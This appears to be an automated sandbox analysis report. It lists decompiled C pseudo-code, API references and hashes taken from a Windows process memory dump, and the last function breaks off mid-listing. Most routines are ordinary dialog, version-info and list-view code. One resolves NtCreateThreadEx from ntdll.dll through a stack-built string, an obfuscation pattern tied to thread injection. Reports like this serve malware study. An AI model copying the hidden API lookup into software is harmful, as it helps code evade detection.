                                                                                                                • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                                				void _v259;
                                                                                                                				void _v260;
                                                                                                                				void _v515;
                                                                                                                				void _v516;
                                                                                                                				char _v1048;
                                                                                                                				void _v1052;
                                                                                                                				void _v1056;
                                                                                                                				void _v1560;
                                                                                                                				long _v1580;
                                                                                                                				void _v3626;
                                                                                                                				char _v3628;
                                                                                                                				void _v5674;
                                                                                                                				char _v5676;
                                                                                                                				void _v9770;
                                                                                                                				short _v9772;
                                                                                                                				void* __edi;
                                                                                                                				void* _t45;
                                                                                                                				void* _t60;
                                                                                                                				int _t61;
                                                                                                                				int _t63;
                                                                                                                				int _t64;
                                                                                                                				long _t68;
                                                                                                                				struct HWND__* _t94;
                                                                                                                				signed int _t103;
                                                                                                                				intOrPtr _t127;
                                                                                                                				unsigned int _t130;
                                                                                                                				void* _t132;
                                                                                                                				void* _t135;
                                                                                                                
                                                                                                                				E0040B550(0x2628, __ecx);
                                                                                                                				_t45 = _a8 - 0x110;
                                                                                                                				if(_t45 == 0) {
                                                                                                                					E00404DA9(__edx, _a4, 4);
                                                                                                                					_v9772 = 0;
                                                                                                                					memset( &_v9770, 0, 0xffe);
                                                                                                                					_t103 = 5;
                                                                                                                					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                                					memset( &_v1560, 0, 0x1f6);
                                                                                                                					_v260 = 0;
                                                                                                                					memset( &_v259, 0, 0xff);
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v515, 0, 0xff);
                                                                                                                					_v5676 = 0;
                                                                                                                					memset( &_v5674, 0, 0x7fe);
                                                                                                                					_v3628 = 0;
                                                                                                                					memset( &_v3626, 0, 0x7fe);
                                                                                                                					_t135 = _t132 + 0x5c;
                                                                                                                					_t60 = GetCurrentProcess();
                                                                                                                					_t105 =  &_v260;
                                                                                                                					_a8 = _t60;
                                                                                                                					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                                                					__eflags = _t61;
                                                                                                                					if(_t61 != 0) {
                                                                                                                						E00404FE0( &_v5676,  &_v260, 4);
                                                                                                                						_pop(_t105);
                                                                                                                					}
                                                                                                                					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                                                					__eflags = _t63;
                                                                                                                					if(_t63 != 0) {
                                                                                                                						E00404FE0( &_v3628,  &_v516, 0);
                                                                                                                						_pop(_t105);
                                                                                                                					}
                                                                                                                					_t64 = E00404BD3();
                                                                                                                					__eflags = _t64;
                                                                                                                					if(_t64 == 0) {
                                                                                                                						E004090EE();
                                                                                                                					} else {
                                                                                                                						E00409172();
                                                                                                                					}
                                                                                                                					__eflags =  *0x4101b8; // 0x0
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L17:
                                                                                                                						_v1056 = 0;
                                                                                                                						memset( &_v1052, 0, 0x218);
                                                                                                                						_t127 =  *0x40f5d4; // 0x0
                                                                                                                						_t135 = _t135 + 0xc;
                                                                                                                						_t68 = GetCurrentProcessId();
                                                                                                                						_push(_t127);
                                                                                                                						_push(_t68);
                                                                                                                						 *0x40f84c = 0;
                                                                                                                						E004092F0(_t105, __eflags);
                                                                                                                						__eflags =  *0x40f84c; // 0x0
                                                                                                                						if(__eflags != 0) {
                                                                                                                							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                                                							_t135 = _t135 + 0xc;
                                                                                                                							__eflags =  *0x40f84c; // 0x0
                                                                                                                							if(__eflags != 0) {
                                                                                                                								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L20;
                                                                                                                					} else {
                                                                                                                						__eflags =  *0x4101bc; // 0x0
                                                                                                                						if(__eflags == 0) {
                                                                                                                							L20:
                                                                                                                							_push( &_v3628);
                                                                                                                							_push( &_v5676);
                                                                                                                							_push( *0x40f3b0);
                                                                                                                							_push( *0x40f3bc);
                                                                                                                							_push( *0x40f3ac);
                                                                                                                							_push( *0x40f394);
                                                                                                                							_push( *0x40f398);
                                                                                                                							_push( *0x40f3a0);
                                                                                                                							_push( *0x40f3a4);
                                                                                                                							_push( *0x40f39c);
                                                                                                                							_push( *0x40f3a8);
                                                                                                                							_push( &_v1580);
                                                                                                                							_push( *0x40f5d4);
                                                                                                                							_push( *0x40f5c8);
                                                                                                                							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                                							_push(0x800);
                                                                                                                							_push( &_v9772);
                                                                                                                							L0040B1EC();
                                                                                                                							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                                							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                                							L21:
                                                                                                                							return 0;
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_t45 == 1) {
                                                                                                                					_t130 = _a12;
                                                                                                                					if(_t130 >> 0x10 == 0) {
                                                                                                                						if(_t130 == 3) {
                                                                                                                							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                                							_a4 = _t94;
                                                                                                                							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                                							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                                							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L21;
                                                                                                                			}
































                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                • {Unknown}, xrefs: 00408BA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                                                                				int _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				int _v20;
                                                                                                                				long _v60;
                                                                                                                				char _v572;
                                                                                                                				void* __esi;
                                                                                                                				int _t47;
                                                                                                                				void* _t50;
                                                                                                                				signed short* _t76;
                                                                                                                				void* _t81;
                                                                                                                				void* _t84;
                                                                                                                				intOrPtr* _t96;
                                                                                                                				int _t97;
                                                                                                                
                                                                                                                				_t96 = __edi;
                                                                                                                				_t97 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                                				_v8 = _t47;
                                                                                                                				if(_t47 > 0) {
                                                                                                                					_t50 = E00405AA7(__edi);
                                                                                                                					_push(_v8);
                                                                                                                					L0040B26C();
                                                                                                                					_t84 = _t50;
                                                                                                                					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                                					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                                						_t81 = _v12;
                                                                                                                						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                                                						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                                						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                                						 *__edi =  *_t13;
                                                                                                                						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                                                						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                                						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                                                						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                                						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                                                						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                                						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                                                						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                                					}
                                                                                                                					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                                						L5:
                                                                                                                						wcscpy( &_v60, L"040904E4");
                                                                                                                					} else {
                                                                                                                						_t76 = _v16;
                                                                                                                						_push(_t76[1] & 0x0000ffff);
                                                                                                                						_push( *_t76 & 0x0000ffff);
                                                                                                                						_push(L"%4.4X%4.4X");
                                                                                                                						_push(0x14);
                                                                                                                						_push( &_v60);
                                                                                                                						L0040B1EC();
                                                                                                                						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                                					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                                					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                                					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                                					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                                					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                                					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                                					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                                					_push(_t84);
                                                                                                                					_t97 = 1;
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				return _t97;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                • wcscpy.MSVCRT ref: 0040B128
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 1223191525-1542517562
                                                                                                                • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                                                				char _v8;
                                                                                                                				char _v9;
                                                                                                                				char _v10;
                                                                                                                				char _v11;
                                                                                                                				char _v12;
                                                                                                                				char _v13;
                                                                                                                				char _v14;
                                                                                                                				char _v15;
                                                                                                                				char _v16;
                                                                                                                				char _v17;
                                                                                                                				char _v18;
                                                                                                                				char _v19;
                                                                                                                				char _v20;
                                                                                                                				char _v21;
                                                                                                                				char _v22;
                                                                                                                				char _v23;
                                                                                                                				char _v24;
                                                                                                                				struct HINSTANCE__* _t27;
                                                                                                                
                                                                                                                				if( *__esi != 0) {
                                                                                                                					L3:
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                                                				 *__esi = _t27;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosw");
                                                                                                                					asm("stosb");
                                                                                                                					_v24 = 0x4e;
                                                                                                                					_v23 = 0x74;
                                                                                                                					_v13 = 0x65;
                                                                                                                					_v12 = 0x61;
                                                                                                                					_v18 = 0x74;
                                                                                                                					_v17 = 0x65;
                                                                                                                					_v22 = 0x43;
                                                                                                                					_v14 = 0x72;
                                                                                                                					_v11 = 0x64;
                                                                                                                					_v21 = 0x72;
                                                                                                                					_v10 = 0x45;
                                                                                                                					_v9 = 0x78;
                                                                                                                					_v20 = 0x65;
                                                                                                                					_v19 = 0x61;
                                                                                                                					_v16 = 0x54;
                                                                                                                					_v15 = 0x68;
                                                                                                                					_v8 = 0;
                                                                                                                					__esi[1] = GetProcAddress(_t27,  &_v24);
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                • API String ID: 2574300362-1257427173
                                                                                                                • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 63%
                                                                                                                			E00407F8D(void* __eax) {
                                                                                                                				struct _SHFILEINFOW _v692;
                                                                                                                				void _v1214;
                                                                                                                				short _v1216;
                                                                                                                				void* _v1244;
                                                                                                                				void* _v1248;
                                                                                                                				void* _v1252;
                                                                                                                				void* _v1256;
                                                                                                                				void* _v1268;
                                                                                                                				void* _t37;
                                                                                                                				long _t38;
                                                                                                                				long _t46;
                                                                                                                				long _t48;
                                                                                                                				long _t58;
                                                                                                                				void* _t62;
                                                                                                                				intOrPtr* _t64;
                                                                                                                
                                                                                                                				_t64 = ImageList_Create;
                                                                                                                				_t62 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                                                					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                                                						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                						 *(_t62 + 0x2a8) = _t48;
                                                                                                                						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                                                						_push( *(_t62 + 0x2a8));
                                                                                                                					} else {
                                                                                                                						_v692.hIcon = 0;
                                                                                                                						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                                						_v1216 = 0;
                                                                                                                						memset( &_v1214, 0, 0x208);
                                                                                                                						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                                						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                                						 *(_t62 + 0x2a8) = _t58;
                                                                                                                						_push(_t58);
                                                                                                                					}
                                                                                                                					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                                                					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                                					 *(_t62 + 0x2ac) = _t46;
                                                                                                                					__imp__ImageList_SetImageCount(_t46, 0);
                                                                                                                					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                                                				}
                                                                                                                				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                                				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                				_v1244 = _t37;
                                                                                                                				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                                                				_t38 = GetSysColor(0xf);
                                                                                                                				_v1248 = _t38;
                                                                                                                				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                                                				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                                                				DeleteObject(_v1268);
                                                                                                                				DeleteObject(_v1268);
                                                                                                                				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                                                			}



















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407FD0
                                                                                                                • memset.MSVCRT ref: 00407FE5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                • LoadImageW.USER32 ref: 004080B4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                • LoadImageW.USER32 ref: 004080D1
                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 304928396-0
                                                                                                                • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                                				int _v8;
                                                                                                                				void _v518;
                                                                                                                				long _v520;
                                                                                                                				void _v1030;
                                                                                                                				char _v1032;
                                                                                                                				intOrPtr _t32;
                                                                                                                				wchar_t* _t57;
                                                                                                                				void* _t58;
                                                                                                                				void* _t59;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t58 = __esi;
                                                                                                                				_v520 = 0;
                                                                                                                				memset( &_v518, 0, 0x1fc);
                                                                                                                				_v1032 = 0;
                                                                                                                				memset( &_v1030, 0, 0x1fc);
                                                                                                                				_t60 = _t59 + 0x18;
                                                                                                                				_v8 = 1;
                                                                                                                				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                                					_v8 = 0;
                                                                                                                				}
                                                                                                                				_t57 = _a4;
                                                                                                                				 *_t57 = 0;
                                                                                                                				if(_v8 != 0) {
                                                                                                                					wcscpy(_t57, L"<font");
                                                                                                                					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                					if(_t32 > 0) {
                                                                                                                						_push(_t32);
                                                                                                                						_push(L" size=\"%d\"");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v520);
                                                                                                                						L0040B1EC();
                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                						_t60 = _t60 + 0x18;
                                                                                                                					}
                                                                                                                					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                						_push(E0040ADC0(_t33,  &_v1032));
                                                                                                                						_push(L" color=\"#%s\"");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v520);
                                                                                                                						L0040B1EC();
                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                					}
                                                                                                                					wcscat(_t57, ">");
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                					wcscat(_t57, L"<b>");
                                                                                                                				}
                                                                                                                				wcscat(_t57, _a8);
                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                					wcscat(_t57, L"</b>");
                                                                                                                				}
                                                                                                                				if(_v8 != 0) {
                                                                                                                					wcscat(_t57, L"</font>");
                                                                                                                				}
                                                                                                                				return _t57;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00403C03(void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t88;
                                                                                                                				void* _t108;
                                                                                                                				void* _t113;
                                                                                                                				void* _t119;
                                                                                                                				void* _t121;
                                                                                                                				void* _t122;
                                                                                                                				void* _t123;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				void* _t134;
                                                                                                                
                                                                                                                				_t113 = _t108;
                                                                                                                				E00403B3C(_t113);
                                                                                                                				E00403B16(_t113);
                                                                                                                				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                                                				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                                                				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                                                				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                                                				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                                                				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                                                				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                                                                				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                				 *_t124 = 0x3ea;
                                                                                                                				E0040AD85(GetDlgItem(??, ??));
                                                                                                                				 *_t124 = 0x3f1;
                                                                                                                				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                                                				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                                                				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                                                				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                                                				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                                                				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                                                				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                                                				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                                                				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                                                				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                                                				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                                                				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                                                                				_t134 = _t124 + 0x78;
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
